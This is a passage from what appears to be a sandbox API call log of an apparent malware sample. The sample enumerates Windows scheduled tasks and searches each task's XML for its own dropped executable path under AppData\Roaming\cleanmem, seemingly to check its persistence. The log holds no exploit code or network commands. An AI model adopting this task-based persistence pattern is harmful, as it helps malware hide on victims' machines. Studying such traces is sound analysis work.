\r\n C:\\Program Files\\Common Files\\Microsoft Shared\\ClickToRun\\OfficeC2RClient.exe\r\n /update SCHEDULEDTASK displaylevel=False\r\n \r\n \r\n", lpSrch="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe") returned 0x0 [0227.200] IUnknown:Release (This=0x296e30) returned 0x0 [0227.200] IRegisteredTaskCollection:get_Item (in: This=0x296cf0, index=0x12e060*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), ppRegisteredTask=0x12e010 | out: ppRegisteredTask=0x12e010*=0x296e30) returned 0x0 [0227.200] IRegisteredTask:get_Name (in: This=0x296e30, pName=0x12e030 | out: pName=0x12e030*="Office ClickToRun Service Monitor") returned 0x0 [0227.200] IRegisteredTask:get_Xml (in: This=0x296e30, pXml=0x12e018 | out: pXml=0x12e018*="\r\n\r\n \r\n 2005-10-11T13:21:17-08:00\r\n Microsoft Office\r\n This task monitors the state of your Microsoft Office ClickToRunSvc and sends crash and error logs to Microsoft.\r\n \r\n \r\n \r\n 2010-12-16T04:00:00\r\n true\r\n PT6H\r\n \r\n P1D\r\n false\r\n \r\n \r\n 1\r\n \r\n \r\n \r\n \r\n \r\n S-1-5-18\r\n HighestAvailable\r\n InteractiveToken\r\n \r\n \r\n \r\n true\r\n true\r\n true\r\n false\r\n false\r\n false\r\n PT30M\r\n 7\r\n true\r\n false\r\n \r\n false\r\n false\r\n \r\n IgnoreNew\r\n false\r\n false\r\n \r\n \r\n \r\n C:\\Program Files\\Common Files\\Microsoft Shared\\ClickToRun\\OfficeC2RClient.exe\r\n /WatchService\r\n \r\n \r\n") returned 0x0 [0227.202] StrStrIW (lpFirst="\r\n\r\n \r\n 2005-10-11T13:21:17-08:00\r\n Microsoft Office\r\n This task monitors the state of your Microsoft Office ClickToRunSvc and sends crash and error logs to Microsoft.\r\n \r\n \r\n \r\n 2010-12-16T04:00:00\r\n true\r\n PT6H\r\n \r\n P1D\r\n false\r\n \r\n \r\n 1\r\n \r\n \r\n \r\n \r\n \r\n S-1-5-18\r\n HighestAvailable\r\n InteractiveToken\r\n \r\n \r\n \r\n true\r\n true\r\n true\r\n false\r\n false\r\n false\r\n PT30M\r\n 7\r\n true\r\n false\r\n \r\n false\r\n false\r\n \r\n IgnoreNew\r\n false\r\n false\r\n \r\n \r\n \r\n C:\\Program Files\\Common Files\\Microsoft Shared\\ClickToRun\\OfficeC2RClient.exe\r\n /WatchService\r\n \r\n \r\n", lpSrch="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe") returned 0x0 [0227.233] IUnknown:Release (This=0x296e30) returned 0x0 [0227.233] IRegisteredTaskCollection:get_Item (in: This=0x296cf0, index=0x12e060*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x3, varVal2=0x0), ppRegisteredTask=0x12e010 | out: ppRegisteredTask=0x12e010*=0x296e30) returned 0x0 [0227.234] IRegisteredTask:get_Name (in: This=0x296e30, pName=0x12e030 | out: pName=0x12e030*="OfficeBackgroundTaskHandlerLogon") returned 0x0 [0227.234] IRegisteredTask:get_Xml (in: This=0x296e30, pXml=0x12e018 | out: pXml=0x12e018*="\r\n\r\n \r\n This task initiates Office Background Task Handler, which updates relevant Office data.\r\n \r\n \r\n \r\n true\r\n \r\n \r\n \r\n \r\n S-1-5-32-545\r\n LeastPrivilege\r\n \r\n \r\n \r\n IgnoreNew\r\n true\r\n true\r\n true\r\n false\r\n true\r\n \r\n false\r\n PT10M\r\n false\r\n \r\n true\r\n true\r\n true\r\n false\r\n 7\r\n \r\n \r\n \r\n C:\\Program Files\\Microsoft Office\\root\\Office16\\officebackgroundtaskhandler.exe\r\n \r\n \r\n") returned 0x0 [0227.235] StrStrIW (lpFirst="\r\n\r\n \r\n This task initiates Office Background Task Handler, which updates relevant Office data.\r\n \r\n \r\n \r\n true\r\n \r\n \r\n \r\n \r\n S-1-5-32-545\r\n LeastPrivilege\r\n \r\n \r\n \r\n IgnoreNew\r\n true\r\n true\r\n true\r\n false\r\n true\r\n \r\n false\r\n PT10M\r\n false\r\n \r\n true\r\n true\r\n true\r\n false\r\n 7\r\n \r\n \r\n \r\n C:\\Program Files\\Microsoft Office\\root\\Office16\\officebackgroundtaskhandler.exe\r\n \r\n \r\n", lpSrch="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe") returned 0x0 [0227.257] IUnknown:Release (This=0x296e30) returned 0x0 [0227.257] IRegisteredTaskCollection:get_Item (in: This=0x296cf0, index=0x12e060*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x4, varVal2=0x0), ppRegisteredTask=0x12e010 | out: ppRegisteredTask=0x12e010*=0x296e30) returned 0x0 [0227.258] IRegisteredTask:get_Name (in: This=0x296e30, pName=0x12e030 | out: pName=0x12e030*="OfficeBackgroundTaskHandlerRegistration") returned 0x0 [0227.258] IRegisteredTask:get_Xml (in: This=0x296e30, pXml=0x12e018 | out: pXml=0x12e018*="\r\n\r\n \r\n This task initiates Office Background Task Handler, which updates relevant Office data.\r\n \r\n \r\n \r\n true\r\n \r\n PT1H\r\n false\r\n \r\n \r\n \r\n \r\n \r\n S-1-5-32-545\r\n LeastPrivilege\r\n \r\n \r\n \r\n IgnoreNew\r\n true\r\n true\r\n true\r\n false\r\n true\r\n \r\n false\r\n false\r\n \r\n true\r\n true\r\n false\r\n false\r\n 7\r\n \r\n \r\n \r\n C:\\Program Files\\Microsoft Office\\root\\Office16\\officebackgroundtaskhandler.exe\r\n \r\n \r\n") returned 0x0 [0227.260] StrStrIW (lpFirst="\r\n\r\n \r\n This task initiates Office Background Task Handler, which updates relevant Office data.\r\n \r\n \r\n \r\n true\r\n \r\n PT1H\r\n false\r\n \r\n \r\n \r\n \r\n \r\n S-1-5-32-545\r\n LeastPrivilege\r\n \r\n \r\n \r\n IgnoreNew\r\n true\r\n true\r\n true\r\n false\r\n true\r\n \r\n false\r\n false\r\n \r\n true\r\n true\r\n false\r\n false\r\n 7\r\n \r\n \r\n \r\n C:\\Program Files\\Microsoft Office\\root\\Office16\\officebackgroundtaskhandler.exe\r\n \r\n \r\n", lpSrch="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe") returned 0x0 [0227.283] IUnknown:Release (This=0x296e30) returned 0x0 [0227.283] IRegisteredTaskCollection:get_Item (in: This=0x296cf0, index=0x12e060*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x5, varVal2=0x0), ppRegisteredTask=0x12e010 | out: ppRegisteredTask=0x12e010*=0x296e30) returned 0x0 [0227.283] IRegisteredTask:get_Name (in: This=0x296e30, pName=0x12e030 | out: pName=0x12e030*="OfficeTelemetryAgentFallBack2016") returned 0x0 [0227.283] IRegisteredTask:get_Xml (in: This=0x296e30, pXml=0x12e018 | out: pXml=0x12e018*="\r\n\r\n \r\n This task initiates the background task for Office Telemetry Agent, which scans and uploads usage and error information for Office solutions.\r\n \r\n \r\n \r\n \r\n PT12H\r\n false\r\n \r\n true\r\n PT30M\r\n \r\n \r\n \r\n \r\n S-1-5-32-545\r\n LeastPrivilege\r\n \r\n \r\n \r\n IgnoreNew\r\n false\r\n false\r\n true\r\n false\r\n true\r\n \r\n true\r\n false\r\n \r\n true\r\n true\r\n false\r\n false\r\n PT0S\r\n 7\r\n \r\n \r\n \r\n C:\\Program Files\\Microsoft Office\\root\\Office16\\msoia.exe\r\n scan upload mininterval:2880\r\n \r\n \r\n") returned 0x0 [0227.285] StrStrIW (lpFirst="\r\n\r\n \r\n This task initiates the background task for Office Telemetry Agent, which scans and uploads usage and error information for Office solutions.\r\n \r\n \r\n \r\n \r\n PT12H\r\n false\r\n \r\n true\r\n PT30M\r\n \r\n \r\n \r\n \r\n S-1-5-32-545\r\n LeastPrivilege\r\n \r\n \r\n \r\n IgnoreNew\r\n false\r\n false\r\n true\r\n false\r\n true\r\n \r\n true\r\n false\r\n \r\n true\r\n true\r\n false\r\n false\r\n PT0S\r\n 7\r\n \r\n \r\n \r\n C:\\Program Files\\Microsoft Office\\root\\Office16\\msoia.exe\r\n scan upload mininterval:2880\r\n \r\n \r\n", lpSrch="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe") returned 0x0 [0227.312] IUnknown:Release (This=0x296e30) returned 0x0 [0227.312] IRegisteredTaskCollection:get_Item (in: This=0x296cf0, index=0x12e060*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x6, varVal2=0x0), ppRegisteredTask=0x12e010 | out: ppRegisteredTask=0x12e010*=0x296e30) returned 0x0 [0227.312] IRegisteredTask:get_Name (in: This=0x296e30, pName=0x12e030 | out: pName=0x12e030*="OfficeTelemetryAgentLogOn2016") returned 0x0 [0227.312] IRegisteredTask:get_Xml (in: This=0x296e30, pXml=0x12e018 | out: pXml=0x12e018*="\r\n\r\n \r\n This task initiates Office Telemetry Agent, which scans and uploads usage and error information for Office solutions when a user logs on to the computer.\r\n \r\n \r\n \r\n \r\n PT8H\r\n false\r\n \r\n true\r\n \r\n \r\n \r\n \r\n S-1-5-32-545\r\n LeastPrivilege\r\n \r\n \r\n \r\n IgnoreNew\r\n true\r\n true\r\n true\r\n false\r\n true\r\n \r\n true\r\n false\r\n \r\n true\r\n true\r\n false\r\n false\r\n PT0S\r\n 7\r\n \r\n \r\n \r\n C:\\Program Files\\Microsoft Office\\root\\Office16\\msoia.exe\r\n scan upload\r\n \r\n \r\n") returned 0x0 [0227.314] StrStrIW (lpFirst="\r\n\r\n \r\n This task initiates Office Telemetry Agent, which scans and uploads usage and error information for Office solutions when a user logs on to the computer.\r\n \r\n \r\n \r\n \r\n PT8H\r\n false\r\n \r\n true\r\n \r\n \r\n \r\n \r\n S-1-5-32-545\r\n LeastPrivilege\r\n \r\n \r\n \r\n IgnoreNew\r\n true\r\n true\r\n true\r\n false\r\n true\r\n \r\n true\r\n false\r\n \r\n true\r\n true\r\n false\r\n false\r\n PT0S\r\n 7\r\n \r\n \r\n \r\n C:\\Program Files\\Microsoft Office\\root\\Office16\\msoia.exe\r\n scan upload\r\n \r\n \r\n", lpSrch="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe") returned 0x0 [0227.339] IUnknown:Release (This=0x296e30) returned 0x0 [0227.339] IUnknown:Release (This=0x296cf0) returned 0x0 [0227.339] ITaskFolder:GetFolders (in: This=0x296c70, flags=0, ppFolders=0x12e028 | out: ppFolders=0x12e028*=0x296cf0) returned 0x0 [0227.340] ITaskFolderCollection:get_Count (in: This=0x296cf0, pCount=0x12e198 | out: pCount=0x12e198*=0) returned 0x0 [0227.340] IUnknown:Release (This=0x296cf0) returned 0x0 [0227.341] TaskScheduler:IUnknown:Release (This=0x296c70) returned 0x0 [0227.341] ITaskFolderCollection:get_Item (in: This=0x296b30, index=0x12e1f0*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), ppFolder=0x12e1a0 | out: ppFolder=0x12e1a0*=0x296c70) returned 0x0 [0227.341] ITaskFolder:GetTasks (in: This=0x296c70, flags=1, ppTasks=0x12e020 | out: ppTasks=0x12e020*=0x296cf0) returned 0x0 [0227.341] IRegisteredTaskCollection:get_Count (in: This=0x296cf0, pCount=0x12e180 | out: pCount=0x12e180*=0) returned 0x0 [0227.342] IUnknown:Release (This=0x296cf0) returned 0x0 [0227.342] ITaskFolder:GetFolders (in: This=0x296c70, flags=0, ppFolders=0x12e028 | out: ppFolders=0x12e028*=0x296cf0) returned 0x0 [0227.369] ITaskFolderCollection:get_Count (in: This=0x296cf0, pCount=0x12e198 | out: pCount=0x12e198*=45) returned 0x0 [0227.369] ITaskFolderCollection:get_Item (in: This=0x296cf0, index=0x12e060*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x1, varVal2=0x0), ppFolder=0x12e010 | out: ppFolder=0x12e010*=0x296e40) returned 0x0 [0227.370] ITaskFolder:GetTasks (in: This=0x296e40, flags=1, ppTasks=0x12de90 | out: ppTasks=0x12de90*=0x296f30) returned 0x0 [0227.372] IRegisteredTaskCollection:get_Count (in: This=0x296f30, pCount=0x12dff0 | out: pCount=0x12dff0*=2) returned 0x0 [0227.372] IRegisteredTaskCollection:get_Item (in: This=0x296f30, index=0x12ded0*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x1, varVal2=0x0), ppRegisteredTask=0x12de80 | out: ppRegisteredTask=0x12de80*=0x2970d0) returned 0x0 [0227.372] IRegisteredTask:get_Name (in: This=0x2970d0, pName=0x12dea0 | out: pName=0x12dea0*="AD RMS Rights Policy Template Management (Automated)") returned 0x0 [0227.372] IRegisteredTask:get_Xml (in: This=0x2970d0, pXml=0x12de88 | out: pXml=0x12de88*="\r\n\r\n \r\n 2006-11-10T14:29:55.5851926\r\n $(@%systemRoot%\\System32\\msdrm.dll,-6001)\r\n $(@%systemRoot%\\System32\\msdrm.dll,-6002)\r\n \\Microsoft\\Windows\\Active Directory Rights Management Services Client\\AD RMS Rights Policy Template Management (Automated)\r\n D:(A;;FA;;;BA)(A;;FA;;;SY)(A;;FRFX;;;WD)\r\n \r\n \r\n \r\n 2006-11-09T03:00:00\r\n true\r\n PT1H\r\n \r\n 1\r\n \r\n \r\n \r\n true\r\n PT1H\r\n \r\n \r\n \r\n \r\n S-1-1-0\r\n LeastPrivilege\r\n \r\n \r\n \r\n \r\n PT10M\r\n PT1H\r\n true\r\n false\r\n \r\n Parallel\r\n false\r\n false\r\n false\r\n true\r\n true\r\n true\r\n false\r\n false\r\n false\r\n false\r\n PT1H\r\n 7\r\n true\r\n \r\n \r\n \r\n {CF2CF428-325B-48D3-8CA8-7633E36E5A32}\r\n \r\n \r\n") returned 0x0 [0227.375] StrStrIW (lpFirst="\r\n\r\n \r\n 2006-11-10T14:29:55.5851926\r\n $(@%systemRoot%\\System32\\msdrm.dll,-6001)\r\n $(@%systemRoot%\\System32\\msdrm.dll,-6002)\r\n \\Microsoft\\Windows\\Active Directory Rights Management Services Client\\AD RMS Rights Policy Template Management (Automated)\r\n D:(A;;FA;;;BA)(A;;FA;;;SY)(A;;FRFX;;;WD)\r\n \r\n \r\n \r\n 2006-11-09T03:00:00\r\n true\r\n PT1H\r\n \r\n 1\r\n \r\n \r\n \r\n true\r\n PT1H\r\n \r\n \r\n \r\n \r\n S-1-1-0\r\n LeastPrivilege\r\n \r\n \r\n \r\n \r\n PT10M\r\n PT1H\r\n true\r\n false\r\n \r\n Parallel\r\n false\r\n false\r\n false\r\n true\r\n true\r\n true\r\n false\r\n false\r\n false\r\n false\r\n PT1H\r\n 7\r\n true\r\n \r\n \r\n \r\n {CF2CF428-325B-48D3-8CA8-7633E36E5A32}\r\n \r\n \r\n", lpSrch="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe") returned 0x0 [0227.410] IUnknown:Release (This=0x2970d0) returned 0x0 [0227.411] IRegisteredTaskCollection:get_Item (in: This=0x296f30, index=0x12ded0*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), ppRegisteredTask=0x12de80 | out: ppRegisteredTask=0x12de80*=0x2970d0) returned 0x0 [0227.411] IRegisteredTask:get_Name (in: This=0x2970d0, pName=0x12dea0 | out: pName=0x12dea0*="AD RMS Rights Policy Template Management (Manual)") returned 0x0 [0227.411] IRegisteredTask:get_Xml (in: This=0x2970d0, pXml=0x12de88 | out: pXml=0x12de88*="\r\n\r\n \r\n 2006-11-10T14:29:55.5851926\r\n $(@%systemRoot%\\System32\\msdrm.dll,-6001)\r\n $(@%systemRoot%\\System32\\msdrm.dll,-6003)\r\n \\Microsoft\\Windows\\Active Directory Rights Management Services Client\\AD RMS Rights Policy Template Management (Manual)\r\n D:(A;;FA;;;BA)(A;;FA;;;SY)(A;;FRFX;;;WD)\r\n \r\n \r\n \r\n false\r\n PT1H\r\n \r\n \r\n \r\n \r\n S-1-1-0\r\n LeastPrivilege\r\n \r\n \r\n \r\n \r\n PT10M\r\n PT1H\r\n true\r\n false\r\n \r\n Parallel\r\n true\r\n true\r\n false\r\n true\r\n true\r\n true\r\n true\r\n false\r\n false\r\n false\r\n PT1H\r\n 7\r\n true\r\n \r\n \r\n \r\n {BF5CB148-7C77-4d8a-A53E-D81C70CF743C}\r\n \r\n \r\n") returned 0x0 [0227.414] StrStrIW (lpFirst="\r\n\r\n \r\n 2006-11-10T14:29:55.5851926\r\n $(@%systemRoot%\\System32\\msdrm.dll,-6001)\r\n $(@%systemRoot%\\System32\\msdrm.dll,-6003)\r\n \\Microsoft\\Windows\\Active Directory Rights Management Services Client\\AD RMS Rights Policy Template Management (Manual)\r\n D:(A;;FA;;;BA)(A;;FA;;;SY)(A;;FRFX;;;WD)\r\n \r\n \r\n \r\n false\r\n PT1H\r\n \r\n \r\n \r\n \r\n S-1-1-0\r\n LeastPrivilege\r\n \r\n \r\n \r\n \r\n PT10M\r\n PT1H\r\n true\r\n false\r\n \r\n Parallel\r\n true\r\n true\r\n false\r\n true\r\n true\r\n true\r\n true\r\n false\r\n false\r\n false\r\n PT1H\r\n 7\r\n true\r\n \r\n \r\n \r\n {BF5CB148-7C77-4d8a-A53E-D81C70CF743C}\r\n \r\n \r\n", lpSrch="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe") returned 0x0 [0227.444] IUnknown:Release (This=0x2970d0) returned 0x0 [0227.444] IUnknown:Release (This=0x296f30) returned 0x0 [0227.444] ITaskFolder:GetFolders (in: This=0x296e40, flags=0, ppFolders=0x12de98 | out: ppFolders=0x12de98*=0x296f30) returned 0x0 [0227.445] ITaskFolderCollection:get_Count (in: This=0x296f30, pCount=0x12e008 | out: pCount=0x12e008*=0) returned 0x0 [0227.445] IUnknown:Release (This=0x296f30) returned 0x0 [0227.445] TaskScheduler:IUnknown:Release (This=0x296e40) returned 0x0 [0227.445] ITaskFolderCollection:get_Item (in: This=0x296cf0, index=0x12e060*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), ppFolder=0x12e010 | out: ppFolder=0x12e010*=0x296e40) returned 0x0 [0227.445] ITaskFolder:GetTasks (in: This=0x296e40, flags=1, ppTasks=0x12de90 | out: ppTasks=0x12de90*=0x296ed0) returned 0x0 [0227.447] IRegisteredTaskCollection:get_Count (in: This=0x296ed0, pCount=0x12dff0 | out: pCount=0x12dff0*=2) returned 0x0 [0227.447] IRegisteredTaskCollection:get_Item (in: This=0x296ed0, index=0x12ded0*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x1, varVal2=0x0), ppRegisteredTask=0x12de80 | out: ppRegisteredTask=0x12de80*=0x297020) returned 0x0 [0227.447] IRegisteredTask:get_Name (in: This=0x297020, pName=0x12dea0 | out: pName=0x12dea0*="PolicyConverter") returned 0x0 [0227.447] IRegisteredTask:get_Xml (in: This=0x297020, pXml=0x12de88 | out: pXml=0x12de88*="\r\n\r\n \r\n D:(A;;FA;;;BA)(A;;FA;;;SY)(A;CI;FA;;;LS)(A;CI;FA;;;S-1-5-80-2078495744-2416903469-4072184685-3943858305-976987417)\r\n $(@%systemroot%\\system32\\appidsvc.dll,-300)\r\n $(@%systemroot%\\system32\\appidsvc.dll,-301)\r\n $(@%systemroot%\\system32\\appidsvc.dll,-302)\r\n Microsoft\\Windows\\AppID\\PolicyConverter\r\n \r\n \r\n true\r\n false\r\n true\r\n Queue\r\n false\r\n false\r\n true\r\n false\r\n false\r\n true\r\n false\r\n false\r\n \r\n \r\n \r\n S-1-5-19\r\n \r\n \r\n \r\n \r\n %windir%\\system32\\appidpolicyconverter.exe\r\n \r\n \r\n") returned 0x0 [0227.449] StrStrIW (lpFirst="\r\n\r\n \r\n D:(A;;FA;;;BA)(A;;FA;;;SY)(A;CI;FA;;;LS)(A;CI;FA;;;S-1-5-80-2078495744-2416903469-4072184685-3943858305-976987417)\r\n $(@%systemroot%\\system32\\appidsvc.dll,-300)\r\n $(@%systemroot%\\system32\\appidsvc.dll,-301)\r\n $(@%systemroot%\\system32\\appidsvc.dll,-302)\r\n Microsoft\\Windows\\AppID\\PolicyConverter\r\n \r\n \r\n true\r\n false\r\n true\r\n Queue\r\n false\r\n false\r\n true\r\n false\r\n false\r\n true\r\n false\r\n false\r\n \r\n \r\n \r\n S-1-5-19\r\n \r\n \r\n \r\n \r\n %windir%\\system32\\appidpolicyconverter.exe\r\n \r\n \r\n", lpSrch="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe") returned 0x0 [0227.472] IUnknown:Release (This=0x297020) returned 0x0 [0227.472] IRegisteredTaskCollection:get_Item (in: This=0x296ed0, index=0x12ded0*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), ppRegisteredTask=0x12de80 | out: ppRegisteredTask=0x12de80*=0x297020) returned 0x0 [0227.472] IRegisteredTask:get_Name (in: This=0x297020, pName=0x12dea0 | out: pName=0x12dea0*="VerifiedPublisherCertStoreCheck") returned 0x0 [0227.472] IRegisteredTask:get_Xml (in: This=0x297020, pXml=0x12de88 | out: pXml=0x12de88*="\r\n\r\n \r\n D:(A;;FA;;;BA)(A;;FA;;;SY)(A;CI;FA;;;LS)(A;CI;FA;;;S-1-5-80-2078495744-2416903469-4072184685-3943858305-976987417)\r\n $(@%systemroot%\\system32\\appidsvc.dll,-200)\r\n $(@%systemroot%\\system32\\appidsvc.dll,-201)\r\n $(@%systemroot%\\system32\\appidsvc.dll,-202)\r\n Microsoft\\Windows\\AppID\\VerifiedPublisherCertStoreCheck\r\n \r\n \r\n \r\n true\r\n PT30M\r\n \r\n PT24H\r\n \r\n \r\n \r\n \r\n true\r\n 10\r\n \r\n PT3M\r\n PT23H\r\n true\r\n true\r\n \r\n false\r\n true\r\n Queue\r\n true\r\n true\r\n true\r\n true\r\n false\r\n true\r\n false\r\n false\r\n \r\n \r\n \r\n S-1-5-19\r\n \r\n \r\n \r\n \r\n %windir%\\system32\\appidcertstorecheck.exe\r\n \r\n \r\n") returned 0x0 [0227.475] StrStrIW (lpFirst="\r\n\r\n \r\n D:(A;;FA;;;BA)(A;;FA;;;SY)(A;CI;FA;;;LS)(A;CI;FA;;;S-1-5-80-2078495744-2416903469-4072184685-3943858305-976987417)\r\n $(@%systemroot%\\system32\\appidsvc.dll,-200)\r\n $(@%systemroot%\\system32\\appidsvc.dll,-201)\r\n $(@%systemroot%\\system32\\appidsvc.dll,-202)\r\n Microsoft\\Windows\\AppID\\VerifiedPublisherCertStoreCheck\r\n \r\n \r\n \r\n true\r\n PT30M\r\n \r\n PT24H\r\n \r\n \r\n \r\n \r\n true\r\n 10\r\n \r\n PT3M\r\n PT23H\r\n true\r\n true\r\n \r\n false\r\n true\r\n Queue\r\n true\r\n true\r\n true\r\n true\r\n false\r\n true\r\n false\r\n false\r\n \r\n \r\n \r\n S-1-5-19\r\n \r\n \r\n \r\n \r\n %windir%\\system32\\appidcertstorecheck.exe\r\n \r\n \r\n", lpSrch="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe") returned 0x0 [0227.504] IUnknown:Release (This=0x297020) returned 0x0 [0227.504] IUnknown:Release (This=0x296ed0) returned 0x0 [0227.504] ITaskFolder:GetFolders (in: This=0x296e40, flags=0, ppFolders=0x12de98 | out: ppFolders=0x12de98*=0x296ed0) returned 0x0 [0227.505] ITaskFolderCollection:get_Count (in: This=0x296ed0, pCount=0x12e008 | out: pCount=0x12e008*=0) returned 0x0 [0227.505] IUnknown:Release (This=0x296ed0) returned 0x0 [0227.505] TaskScheduler:IUnknown:Release (This=0x296e40) returned 0x0 [0227.505] ITaskFolderCollection:get_Item (in: This=0x296cf0, index=0x12e060*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x3, varVal2=0x0), ppFolder=0x12e010 | out: ppFolder=0x12e010*=0x296e40) returned 0x0 [0227.505] ITaskFolder:GetTasks (in: This=0x296e40, flags=1, ppTasks=0x12de90 | out: ppTasks=0x12de90*=0x296ef0) returned 0x0 [0227.507] IRegisteredTaskCollection:get_Count (in: This=0x296ef0, pCount=0x12dff0 | out: pCount=0x12dff0*=2) returned 0x0 [0227.507] IRegisteredTaskCollection:get_Item (in: This=0x296ef0, index=0x12ded0*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x1, varVal2=0x0), ppRegisteredTask=0x12de80 | out: ppRegisteredTask=0x12de80*=0x297060) returned 0x0 [0227.507] IRegisteredTask:get_Name (in: This=0x297060, pName=0x12dea0 | out: pName=0x12dea0*="AitAgent") returned 0x0 [0227.507] IRegisteredTask:get_Xml (in: This=0x297060, pXml=0x12de88 | out: pXml=0x12de88*="\r\n\r\n \r\n 1.0\r\n \\Microsoft\\Windows\\Application Experience\\AitAgent\r\n D:(A;;GA;;;BA)(A;;GA;;;SY)\r\n $(@%SystemRoot%\\system32\\aitagent.exe,-701)\r\n $(@%SystemRoot%\\system32\\aitagent.exe,-701)\r\n $(@%SystemRoot%\\system32\\aitagent.exe,-702)\r\n \r\n \r\n \r\n 2007-10-08T02:30:00\r\n \r\n 1\r\n \r\n \r\n \r\n \r\n true\r\n false\r\n true\r\n true\r\n true\r\n IgnoreNew\r\n true\r\n true\r\n false\r\n true\r\n \r\n PT3M\r\n PT22H\r\n true\r\n true\r\n \r\n 9\r\n \r\n \r\n \r\n S-1-5-18\r\n \r\n \r\n \r\n \r\n aitagent\r\n \r\n \r\n") returned 0x0 [0227.509] StrStrIW (lpFirst="\r\n\r\n \r\n 1.0\r\n \\Microsoft\\Windows\\Application Experience\\AitAgent\r\n D:(A;;GA;;;BA)(A;;GA;;;SY)\r\n $(@%SystemRoot%\\system32\\aitagent.exe,-701)\r\n $(@%SystemRoot%\\system32\\aitagent.exe,-701)\r\n $(@%SystemRoot%\\system32\\aitagent.exe,-702)\r\n \r\n \r\n \r\n 2007-10-08T02:30:00\r\n \r\n 1\r\n \r\n \r\n \r\n \r\n true\r\n false\r\n true\r\n true\r\n true\r\n IgnoreNew\r\n true\r\n true\r\n false\r\n true\r\n \r\n PT3M\r\n PT22H\r\n true\r\n true\r\n \r\n 9\r\n \r\n \r\n \r\n S-1-5-18\r\n \r\n \r\n \r\n \r\n aitagent\r\n \r\n \r\n", lpSrch="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe") returned 0x0 [0227.535] IUnknown:Release (This=0x297060) returned 0x0 [0227.535] IRegisteredTaskCollection:get_Item (in: This=0x296ef0, index=0x12ded0*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), ppRegisteredTask=0x12de80 | out: ppRegisteredTask=0x12de80*=0x297060) returned 0x0 [0227.536] IRegisteredTask:get_Name (in: This=0x297060, pName=0x12dea0 | out: pName=0x12dea0*="ProgramDataUpdater") returned 0x0 [0227.536] IRegisteredTask:get_Xml (in: This=0x297060, pXml=0x12de88 | out: pXml=0x12de88*="\r\n\r\n \r\n 1.0\r\n \\Microsoft\\Windows\\Application Experience\\ProgramDataUpdater\r\n D:(A;;GA;;;BA)(A;;GA;;;SY)\r\n $(@%SystemRoot%\\system32\\aepdu.dll,-701)\r\n $(@%SystemRoot%\\system32\\aepdu.dll,-701)\r\n $(@%SystemRoot%\\system32\\aepdu.dll,-702)\r\n \r\n \r\n \r\n 2007-10-08T00:30:00\r\n \r\n 1\r\n \r\n \r\n \r\n \r\n false\r\n false\r\n true\r\n true\r\n true\r\n IgnoreNew\r\n true\r\n true\r\n false\r\n \r\n PT3M\r\n PT23H\r\n true\r\n true\r\n \r\n 4\r\n true\r\n \r\n \r\n \r\n S-1-5-18\r\n \r\n \r\n \r\n \r\n %windir%\\system32\\rundll32.exe\r\n aepdu.dll,AePduRunUpdate\r\n \r\n \r\n") returned 0x0 [0227.538] StrStrIW (lpFirst="\r\n\r\n \r\n 1.0\r\n \\Microsoft\\Windows\\Application Experience\\ProgramDataUpdater\r\n D:(A;;GA;;;BA)(A;;GA;;;SY)\r\n $(@%SystemRoot%\\system32\\aepdu.dll,-701)\r\n $(@%SystemRoot%\\system32\\aepdu.dll,-701)\r\n $(@%SystemRoot%\\system32\\aepdu.dll,-702)\r\n \r\n \r\n \r\n 2007-10-08T00:30:00\r\n \r\n 1\r\n \r\n \r\n \r\n \r\n false\r\n false\r\n true\r\n true\r\n true\r\n IgnoreNew\r\n true\r\n true\r\n false\r\n \r\n PT3M\r\n PT23H\r\n true\r\n true\r\n \r\n 4\r\n true\r\n \r\n \r\n \r\n S-1-5-18\r\n \r\n \r\n \r\n \r\n %windir%\\system32\\rundll32.exe\r\n aepdu.dll,AePduRunUpdate\r\n \r\n \r\n", lpSrch="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe") returned 0x0 [0227.566] IUnknown:Release (This=0x297060) returned 0x0 [0227.566] IUnknown:Release (This=0x296ef0) returned 0x0 [0227.566] ITaskFolder:GetFolders (in: This=0x296e40, flags=0, ppFolders=0x12de98 | out: ppFolders=0x12de98*=0x296ef0) returned 0x0 [0227.567] ITaskFolderCollection:get_Count (in: This=0x296ef0, pCount=0x12e008 | out: pCount=0x12e008*=0) returned 0x0 [0227.567] IUnknown:Release (This=0x296ef0) returned 0x0 [0227.567] TaskScheduler:IUnknown:Release (This=0x296e40) returned 0x0 [0227.567] 